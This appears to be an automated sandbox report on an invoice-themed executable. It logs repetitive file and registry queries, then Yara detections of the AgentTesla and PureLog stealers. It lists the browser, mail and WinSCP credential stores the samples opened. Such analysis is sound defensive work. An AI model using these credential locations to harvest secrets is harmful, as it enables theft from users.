Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Users\user\Desktop\Proforma Invoice.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Queries volume information: C:\Users\user\AppData\Roaming\VoAlKljQu.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Queries volume information: C:\Users\user\AppData\Roaming\VoAlKljQu.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\Proforma Invoice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.Proforma Invoice.exe.3943ce8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.3943ce8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.39090c8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.39090c8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.4093089236.0000000002C3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4089522808.0000000000434000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4093089949.00000000030F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4093089949.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686647135.0000000004202000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4093089236.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686647135.0000000003870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Proforma Invoice.exe PID: 6412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Proforma Invoice.exe PID: 7372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VoAlKljQu.exe PID: 7764, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.Proforma Invoice.exe.3599970.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.25d0894.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.25c087c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.5080000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.VoAlKljQu.exe.2b80898.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.2a00cd0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.VoAlKljQu.exe.2fb0ce8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.VoAlKljQu.exe.2fb0ce8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.VoAlKljQu.exe.2b70880.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.5000000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.VoAlKljQu.exe.2f72f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.VoAlKljQu.exe.2b70880.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.5080000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.29b3ed8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.25d0894.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.29b8ef0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.25c087c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.2a00cd0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Proforma Invoice.exe.29c2f08.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.VoAlKljQu.exe.2b80898.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.1726797038.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686647135.0000000003599000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1685780768.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1726797038.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1689723543.0000000005080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1689597695.0000000005000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1726797038.0000000002FB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1685780768.0000000002988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1685780768.0000000002591000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1685780768.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1726797038.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Proforma Invoice.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
